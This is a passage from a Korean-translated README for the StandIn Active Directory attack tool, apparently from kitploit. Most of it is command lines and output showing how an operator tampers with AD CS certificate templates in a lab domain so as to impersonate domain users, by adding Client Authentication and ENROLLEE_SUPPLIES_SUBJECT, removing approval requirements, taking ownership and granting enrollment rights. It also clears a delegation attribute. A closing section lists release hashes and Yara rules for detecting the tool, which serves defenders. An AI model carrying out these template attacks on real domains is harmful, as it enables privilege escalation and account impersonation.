[?] Using DC : m-w16-dc01.main.redhook.local [?] Object : CN=M-10-1909-03 Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local [+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity

C:> StandIn.exe --object samaccountname=m-10-1909-03$

[?] Using DC : m-w16-dc01.main.redhook.local [?] Object : CN=M-10-1909-03 Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[?] Iterating object properties

[+] logoncount |_ 107 [+] codepage |_ 0 [+] objectcategory |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local [+] iscriticalsystemobject |_ False [+] operatingsystem |_ Windows 10 Enterprise [+] usnchanged |_ 195771 [+] instancetype |_ 4 [+] name |_ M-10-1909-03 [+] badpasswordtime |_ 7/9/2020 5:07:11 PM UTC [+] pwdlastset |_ 10/29/2020 6:44:08 PM UTC [+] serviceprincipalname |_ TERMSRV/M-10-1909-03 |_ TERMSRV/m-10-1909-03.main.redhook.local |_ WSMAN/m-10-1909-03 |_ WSMAN/m-10-1909-03.main.redhook.local |_ RestrictedKrbHost/M-10-1909-03 |_ HOST/M-10-1909-03 |_ RestrictedKrbHost/m-10-1909-03.main.redhook.local |_ HOST/m-10-1909-03.main.redhook.local [+] objectclass |_ top |_ person |_ organizationalPerson |_ user |_ computer [+] badpwdcount |_ 0 [+] samaccounttype |_ SAM_MACHINE_ACCOUNT [+] lastlogontimestamp |_ 10/29/2020 12:29:26 PM UTC [+] usncreated |_ 31127 [+] objectguid |_ c02cff97-4bfd-457c-a568-a748b0725c2f [+] localpolicyflags |_ 0 [+] whencreated |_ 7/9/2020 5:05:08 PM [+] adspath |_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local [+] useraccountcontrol |_ WORKSTATION_TRUST_ACCOUNT [+] cn |_ M-10-1909-03 [+] countrycode |_ 0 [+] primarygroupid |_ 515 [+] whenchanged |_ 11/2/2020 7:55:14 PM [+] operatingsystemversion |_ 10.0 (18363) [+] dnshostname |_ m-10-1909-03.main.redhook.local [+] dscorepropagationdata |_ 10/30/2020 6:56:30 PM |_ 10/30/2020 10:55:22 AM |_ 10/29/2020 4:58:51 PM |_ 10/29/2020 4:58:29 PM |_ 1/1/1601 12:00:01 AM [+] lastlogon |_ 11/2/2020 9:07:20 AM UTC [+] distinguishedname |_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local [+] msds-supportedencryptiontypes |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 [+] samaccountname |_ M-10-1909-03$ [+] objectsid |_ S-1-5-21-1293271031-3053586410-2290657902-1127 [+] lastlogoff |_ 0 [+] msds-allowedtoactonbehalfofotheridentity |_ BinLen : 36 |_ AceQualifier : AccessAllowed |_ IsCallback : False |_ OpaqueLength : 0 |_ AccessMask : 983551 |_ SID : S-1-5-21-1293271031-3053586410-2290657902-1205 |_ AceType : AccessAllowed |_ AceFlags : None |_ IsInherited : False |_ InheritanceFlags : None |_ PropagationFlags : None |_ AuditFlags : None [+] accountexpires |_ 0x7FFFFFFFFFFFFFFF

root@kitploit:~
### msDS-AllowedToActOnBehalfOfOtherIdentity 제거

#### 사용 사례

> *컴퓨터 개체에 대한 쓰기 권한이 있는 경우 이 기능을 사용하여 연산자가 컴퓨터에서 이전에 추가된 `msDS-AllowedToActOnBehalfOfOtherIdentity` 속성을 제거할 수 있습니다.*

#### 구문

컴퓨터에서 이전에 생성된 `msDS-AllowedToActOnBehalfOfOtherIdentity` 속성을 제거합니다.```
C:\> StandIn.exe --computer m-10-1909-03 --remove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=M-10-1909-03
    Path     : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..

Active Directory 인증서 서비스 (ADCS)

다음은 Certify의 보조 함수입니다. 기본 템플릿 상태를 즉시 사용할 수 없는 경우 template 공격을 용이하게 할 수 있습니다.

목록

사용 사례

이 함수는 모든 도메인 CA를 열거하고 모든 발행된 템플릿을 나열합니다. 선택적으로 전체 템플릿 이름이나 이름의 일부에 대해 --filter 와일드카드를 사용할 수 있습니다.

구문

모든 발행된 템플릿을 검색하고, 이 경우 filter를 사용하여 출력을 web과 일치하는 템플릿만 반환합니다.``` C:>StandIn.exe --adcs --filter web

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Certificate Authority : redhook-RH-DC01-CA |_ DNS Hostname : RH-DC01.redhook.local |_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local |_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53 |_ Published Templates : CrossCA DirectoryEmailReplication DomainControllerAuthentication KerberosAuthentication EFSRecovery EFS DomainController WebServer Machine User SubCA Administrator

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Schema Version : 1 |_ pKIExpirationPeriod : 2 years |_ pKIOverlapPeriod : 6 weeks |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Server Authentication |_ Owner : REDHOOK\Enterprise Admins |_ Permission Identity : REDHOOK\Domain Admins | |_ Type : Allow | |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\Domain Users | |_ Type : Allow | |_ Permission : GenericAll | |_ Object : ANY |_ Permission Identity : REDHOOK\Enterprise Admins | |_ Type : Allow | |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\Domain Admins | |_ Type : Allow | |_ Permission : ReadProperty, WriteProperty, ExtendedRight | |_ Object : Certificate-Enrollment |_ Permission Identity : REDHOOK\Enterprise Admins | |_ Type : Allow | |_ Permission : ReadProperty, WriteProperty, ExtendedRight | |_ Object : Certificate-Enrollment |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 1:57:16 PM

root@kitploit:~
### Client Authentication

#### 사용 사례

> *도메인 사용자를 가장하는 데 사용할 수 있는 인증서를 생성하려면 인증서 템플릿 `pKIExtendedKeyUsage` 속성에 `Client Authentication` 플래그가 포함되어야 합니다. 적절한 `object permissions`이 있는 경우 이 기능을 사용하면 운영자가 템플릿에서 해당 플래그를 추가하거나 제거할 수 있습니다.*

#### 구문

`WebServer` 템플릿에서 `Client Authentication` 플래그를 추가/제거합니다. 여기서 `--filter` 플래그는 템플릿 이름과 정확히 일치해야 합니다.```
C:\>StandIn.exe --adcs --filter WebServer --clientauth --add

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 2:40:06 PM

[+] Adding pKIExtendedKeyUsage : Client Authentication
    |_ Success

C:\>StandIn.exe --adcs --filter WebServer --clientauth --remove

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 1:57:16 PM

[+] Removing pKIExtendedKeyUsage : Client Authentication
    |_ Success

ENROLLEE_SUPPLIES_SUBJECT

사용 사례

인증서 요청 시 임의의 사용자 ID를 제공할 수 있도록 하려면, 인증서 템플릿 msPKI-Certificate-Name-Flag 속성에 ENROLLEE_SUPPLIES_SUBJECT 플래그가 포함되어 있어야 합니다. 적절한 객체 권한을 통해 이 기능을 사용하면 운영자가 템플릿에서 해당 플래그를 추가하거나 제거할 수 있습니다.

구문

WebServer 템플릿에서 ENROLLEE_SUPPLIES_SUBJECT 플래그를 추가/제거합니다. 여기서 --filter 플래그는 템플릿 이름과 정확히 일치해야 합니다.``` C:>StandIn.exe --adcs --filter WebServer --ess --add

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Enroll Flags : NONE |_ Name Flags : 0 |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 2:50:34 PM

[+] Adding msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT |_ Success

C:>StandIn.exe --adcs --filter WebServer --ess --remove

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 2:40:08 PM

[+] Removing msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT |_ Success

root@kitploit:~
### PEND_ALL_REQUESTS

#### 사용 사례

> *인증서 템플릿 `msPKI-Enrollment-Flag` 속성에 `PEND_ALL_REQUESTS` 플래그가 포함되어 있으면 모든 인증서 요청이 `pending` 상태로 대기열에 추가되며, `CA Certificate Manager`가 해당 요청을 승인해야 합니다. 이는 공격자 관점에서 바람직하지 않습니다. 적절한 `object permissions`을 통해 이 함수는 운영자가 해당 플래그를 템플릿에서 추가하거나 제거할 수 있도록 합니다.*

#### 구문

`WebServer` 템플릿에서 `PEND_ALL_REQUESTS` 플래그를 추가/제거합니다. 여기서 `--filter` 플래그는 템플릿 이름과 정확히 일치해야 합니다.```
C:\>StandIn.exe --adcs --filter WebServer --pend --remove

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : PEND_ALL_REQUESTS
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 2:54:51 PM

[+] Removing msPKI-Enrollment-Flag : PEND_ALL_REQUESTS
    |_ Success

C:\>StandIn.exe --adcs --filter WebServer --pend --add

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 2:50:37 PM

[+] Adding msPKI-Enrollment-Flag : PEND_ALL_REQUESTS
    |_ Success

Change Owner

사용 사례

일부 특수한 경우, 운영자는 template object에 대해 WriteOwner 권한을 가질 수 있습니다. 다른 공격이 불가능한 경우, 운영자는 템플릿의 소유자를 변경하여 새 소유자에게 템플릿에 대한 GenericAll 권한을 부여할 수 있습니다. 이 공격은 바람직하지 않습니다. caveats를 참조하십시오.

구문

template object의 Owner를 REDHOOK\MBWillett로 설정합니다. 여기서 --filter 플래그는 템플릿 이름과 정확히 일치해야 합니다.``` C:>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --owner

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 2:58:19 PM

[+] Set object access rules

[+] Changing template owner : REDHOOK\MBWillett |_ Success

C:>StandIn.exe --adcs --filter WebServer

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Certificate Authority : redhook-RH-DC01-CA |_ DNS Hostname : RH-DC01.redhook.local |_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local |_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53 |_ Published Templates : CrossCA DirectoryEmailReplication DomainControllerAuthentication KerberosAuthentication EFSRecovery EFS DomainController WebServer Machine User SubCA Administrator

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Schema Version : 1 |_ pKIExpirationPeriod : 2 years |_ pKIOverlapPeriod : 6 weeks |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Owner : REDHOOK\MBWillett |_ Permission Identity : REDHOOK\Domain Admins | |_ Type : Allow | |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\Domain Users | |_ Type : Allow | |_ Permission : GenericAll | |_ Object : ANY |_ Permission Identity : REDHOOK\Enterprise Admins | |_ Type : Allow | |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\Domain Admins | |_ Type : Allow | |_ Permission : ReadProperty, WriteProperty, ExtendedRight | |_ Object : Certificate-Enrollment |_ Permission Identity : REDHOOK\Enterprise Admins | |_ Type : Allow | |_ Permission : ReadProperty, WriteProperty, ExtendedRight | |_ Object : Certificate-Enrollment |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 3:05:45 PM

root@kitploit:~
#### Caveats

이 공격에는 몇 가지 추가 제약 조건이 있습니다. 실험실 테스트에서 `user context`가 `WriteOwner` 권한을 가진 경우 해당 사용자는 `only change the Owner to themselves`만 할 수 있으며, 다른 사용자 ID로 요청하면 실패한다는 것을 발견했습니다. 또한, 한 번 변경된 소유자는 `Enterprise Admins` 컨텍스트에서 실행하지 않는 한 이전 상태로 되돌릴 수 없습니다.

이러한 제약으로 인해 이 공격은 바람직하지 않으며, 다른 옵션이 없을 때만 사용해야 합니다. 이전 `Owner`로 되돌리기 위해 운영자는 `Enterprise Admins` 사용자에 대한 인증서를 생성하고 이를 사용하여 소유자를 다시 변경할 수 있습니다.```
# WebServer owned by REDHOOK\MBWillett & executing as "REDHOOK\MBWillett"
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\Enterprise Admins" --owner

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 4:18:21 PM

[+] Set object access rules

[+] Changing template owner : REDHOOK\Enterprise Admins
[!] Failed to modify ADCS permissions..
    |_ A constraint violation occurred.

# WebServer owned by REDHOOK\MBWillett & executing in "REDHOOK\Enterprise Admins" context
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\Enterprise Admins" --owner

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 3:05:45 PM

[+] Set object access rules

[+] Changing template owner : REDHOOK\Enterprise Admins
    |_ Success

쓰기 권한 추가

사용 사례

템플릿 쓰기 권한은 다른 template attacks 중 일부를 수행하는 데 필요할 수 있습니다. 적절한 object permissions이 있으면 이 함수를 통해 연산자가 template object에서 NtAccount에 대해 WriteDacl / WriteOwner / WriteProperty 권한을 추가하거나 제거할 수 있습니다.

구문

REDHOOK\MBWillett 사용자에 대해 WebServer 템플릿에 Write 권한을 추가/제거합니다. 여기서 --filter 플래그는 템플릿 이름과 정확히 일치해야 합니다.``` C:>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --write --add

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 3:15:44 PM

[+] Set object access rules

[+] Adding write permissions : REDHOOK\MBWillett |_ Success

C:>StandIn.exe --adcs --filter WebServer

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Certificate Authority : redhook-RH-DC01-CA |_ DNS Hostname : RH-DC01.redhook.local |_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local |_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53 |_ Published Templates : CrossCA DirectoryEmailReplication DomainControllerAuthentication KerberosAuthentication EFSRecovery EFS DomainController WebServer Machine User SubCA Administrator

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Schema Version : 1 |_ pKIExpirationPeriod : 2 years |_ pKIOverlapPeriod : 6 weeks |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Owner : REDHOOK\Enterprise Admins |_ Permission Identity : REDHOOK\Domain Admins | |_ Type : Allow | |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\Domain Users | |_ Type : Allow | |_ Permission : GenericAll | |_ Object : ANY |_ Permission Identity : REDHOOK\Enterprise Admins | |_ Type : Allow | |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\MBWillett | |_ Type : Allow | |_ Permission : WriteProperty, WriteDacl, WriteOwner | |_ Object : ANY |_ Permission Identity : REDHOOK\Domain Admins | |_ Type : Allow | |_ Permission : ReadProperty, WriteProperty, ExtendedRight | |_ Object : Certificate-Enrollment |_ Permission Identity : REDHOOK\Enterprise Admins | |_ Type : Allow | |_ Permission : ReadProperty, WriteProperty, ExtendedRight | |_ Object : Certificate-Enrollment |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 3:29:36 PM

C:>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --write --remove

[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA : redhook-RH-DC01-CA |_ Template : WebServer |_ Enroll Flags : NONE |_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT |_ pKIExtendedKeyUsage : Client Authentication | Server Authentication |_ Created : 11/24/2021 4:37:30 PM |_ Modified : 11/29/2021 3:29:36 PM

[+] Set object access rules

[+] Removing write permissions : REDHOOK\MBWillett |_ Success

root@kitploit:~
### 인증서 등록 권한 추가

#### 사용 사례

> *`템플릿 인증서`를 요청하려면 `요청자`가 `인증서 등록` 권한을 가지고 있어야 합니다. 적절한 `개체 권한`을 통해 이 기능은 운영자가 `템플릿 개체`에서 `NtAccount`에 `인증서 등록` 권한을 추가하거나 제거할 수 있도록 합니다.*

#### 구문

`WebServer` 템플릿에서 `REDHOOK\MBWillett`에 대해 `인증서 등록` 권한을 추가/제거합니다. 여기서 `--filter` 플래그는 템플릿 이름과 정확히 일치해야 합니다.```
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --enroll --add

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 3:29:57 PM

[+] Set object access rules

[+] Adding Certificate-Enrollment permission : REDHOOK\MBWillett
    |_ Success

C:\>StandIn.exe --adcs --filter WebServer

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Certificate Authority  : redhook-RH-DC01-CA
    |_ DNS Hostname        : RH-DC01.redhook.local
    |_ Cert DN             : CN=redhook-RH-DC01-CA, DC=redhook, DC=local
    |_ GUID                : e1885348-e2b3-4e02-9147-54c4c430bc53
    |_ Published Templates : CrossCA
                             DirectoryEmailReplication
                             DomainControllerAuthentication
                             KerberosAuthentication
                             EFSRecovery
                             EFS
                             DomainController
                             WebServer
                             Machine
                             User
                             SubCA
                             Administrator

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Schema Version      : 1
    |_ pKIExpirationPeriod : 2 years
    |_ pKIOverlapPeriod    : 6 weeks
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Owner               : REDHOOK\Enterprise Admins
    |_ Permission Identity : REDHOOK\Domain Admins
    |  |_ Type             : Allow
    |  |_ Permission       : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
    |  |_ Object           : ANY
    |_ Permission Identity : REDHOOK\Domain Users
    |  |_ Type             : Allow
    |  |_ Permission       : GenericAll
    |  |_ Object           : ANY
    |_ Permission Identity : REDHOOK\Enterprise Admins
    |  |_ Type             : Allow
    |  |_ Permission       : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
    |  |_ Object           : ANY
    |_ Permission Identity : REDHOOK\Domain Admins
    |  |_ Type             : Allow
    |  |_ Permission       : ReadProperty, WriteProperty, ExtendedRight
    |  |_ Object           : Certificate-Enrollment
    |_ Permission Identity : REDHOOK\Enterprise Admins
    |  |_ Type             : Allow
    |  |_ Permission       : ReadProperty, WriteProperty, ExtendedRight
    |  |_ Object           : Certificate-Enrollment
    |_ Permission Identity : REDHOOK\MBWillett
    |  |_ Type             : Allow
    |  |_ Permission       : ExtendedRight
    |  |_ Object           : Certificate-Enrollment
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 3:38:36 PM

C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --enroll --remove

[+] Search Base  : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local

[>] Publishing CA          : redhook-RH-DC01-CA
    |_ Template            : WebServer
    |_ Enroll Flags        : NONE
    |_ Name Flags          : ENROLLEE_SUPPLIES_SUBJECT
    |_ pKIExtendedKeyUsage : Client Authentication
    |                        Server Authentication
    |_ Created             : 11/24/2021 4:37:30 PM
    |_ Modified            : 11/29/2021 3:38:36 PM

[+] Set object access rules

[+] Removing Certificate-Enrollment permission : REDHOOK\MBWillett
    |_ Success

탐지

이 섹션에서는 StandIn의 탐지 엔지니어링 과정에 도움이 될 수 있는 여러 IOC를 설명합니다.

릴리즈 패키지 해시

다음 표는 StandIn의 릴리즈 패키지 해시를 매핑합니다.``` -=v1.3=- StandIn_Net35.exe SHA256: C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2 MD5: 5E9364F46723B7DC5FF24DE6E9C69E76

StandIn_Net45.exe SHA256: 2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6 MD5: 566FFA0555E81560407B8CE6E458E829

-=v1.2=- StandIn_Net35.exe SHA256: DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA MD5: D11A8CC4768221CEB5A128A349C5E094

StandIn_Net45.exe SHA256: 24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7 MD5: DA2AFD1868FBEB9357C8D0FD62ED97EB

-=v0.8=- StandIn_Net35.exe SHA256: A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3 MD5: 8C942EE4553E40A7968FF0C8DC5DB9AB

StandIn_Net45.exe SHA256: F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681 MD5: 9E0FC3159A6BF8C3A8A0FAA76F6F74F9

-=v0.7=- StandIn_Net35.exe SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0 MD5: 50D29F7597BF83D80418DEEFD360F093

StandIn_Net45.exe SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A MD5: 4E5258A876ABCD2CA2EF80E0D5D93195

root@kitploit:~
#### Yara

다음 Yara 규칙은 기본 형태의 StandIn을 디스크에서 탐지하는 데 사용할 수 있습니다.```js
rule StandIn
{
    meta:
        author = "Ruben Boonen (@FuzzySec)"
        description = "Detect StandIn string constants."

    strings:
        $s1 = "StandIn" ascii wide nocase
        $s2 = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" ascii wide nocase
        $s3 = "msDS-AllowedToActOnBehalfOfOtherIdentity" ascii wide nocase
        $s4 = ">--~~--> Args? <--~~--<" ascii wide nocase

    condition:
        all of ($s*)
}

rule StandIn_PDB
{
    meta:
        author = "Ruben Boonen (@FuzzySec)"
        description = "Detect StandIn default PDB."

    strings:
        $s1 = "\\Release\\StandIn.pdb" ascii wide nocase
	
    condition:
        all of ($s*)
}

SilktETW Microsoft-Windows-DotNETRuntime Yara 규칙

아래 Yara 규칙은 StandIn이 메모리에서 실행될 때 이를 탐지하는 데 사용할 수 있습니다. 이 규칙을 사용하려면 EDR 솔루션이 Microsoft-Windows-DotNETRuntime ETW 데이터 공급자에 접근할 수 있어야 합니다. 테스트 목적으로 이 규칙은 SilkETW를 사용하여 직접 평가할 수 있습니다. 이는 일반적인 예제 규칙이며, 운영 환경에서 경고를 생성하려면 더 세분화된 접근 방식이 필요합니다.```js rule Silk_StandIn_Generic { meta: author = "Ruben Boonen (@FuzzySec)" description = "Generic Microsoft-Windows-DotNETRuntime detection for StandIn."

root@kitploit:~
strings:
    $s1 = "\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn" ascii wide nocase
    $s2 = "MethodFlags=Jitted;\\r\\nMethodNamespace=StandIn." ascii wide nocase

condition:
    any of them

}

root@kitploit:~
![Help](https://assets.kitploit.com/production/public/readmes/4103/ef9a8b2388d9ea7f48d1d0c7c022fbdd2026138754857698eaa4b2bc352cc888.png)

## 특별 감사

코드 및/또는 버그 수정을 `StandIn`에 기여해 주신 분들께 짧게 감사 인사를 드리고 싶습니다.

[@G0ldenGunSec](https://twitter.com/G0ldenGunSec), [@matterpreter](https://twitter.com/matterpreter), [guervild](https://github.com/guervild)
도구 다운로드
  • 쓰기 권한 추가
  • 인증서-등록 권한 추가
  • 탐지
  • 특별 감사